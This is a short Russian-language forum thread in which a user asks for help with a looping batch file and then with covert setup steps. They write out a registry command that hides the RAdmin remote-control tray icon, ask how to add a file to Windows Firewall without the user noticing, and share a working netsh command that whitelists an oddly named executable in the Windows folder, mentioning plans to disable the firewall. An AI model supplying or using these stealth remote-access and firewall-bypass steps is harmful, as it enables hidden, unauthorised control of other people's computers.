DooD спасибо когда через "Командная строка" запускаю этот код... все ок добавляет! но когда сохраняю в bat формат он что то тупит как буд то данный процесс включен бесконечный раз и повтаряет эту команду пока я его не закрою в чем проблема?)
Удалил так же( есть другие идеи? попробувал даже REG IMPORT reg.reg но так же... идет бесконечный процесс и ничего не случается даже я вот весь код удалил оставил только REG так же делает дело в reg надо как то правильно написать код но как?
shell_c0de сделал как вы сказали открывает компндную строку и замирает ничего не происходит проверил на 2 компах так же( странно что то можете загрузить свою рабочую версию тут я скачаю на свой комп и посмотрю..
у дових не пашет)) может это из-за ссылки к определенному файла?? я другой попробувал работает... типо этого... REG ADD HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d 00000001 /f А МОЖНО ЕЩЕ ПО ДРУГОМУ ДОБАВИТЬ НУЖНЫЙ ФАЙЛ В Брандмауэр Windows НЕЗАМЕТНО ЧТОБЫ НЕ РУГАЛСЯ? В XP И В 7 ЗА РАНЕЕ СПАСИБО
все нашел спасибо дружище!!))) вот так netsh firewall add allowedprogram C:\WINDOWS\1111111111.exe 1111111111 ENABLE можно внести туда нужный файл отлично работает) потом посмотрю как можно его отключить)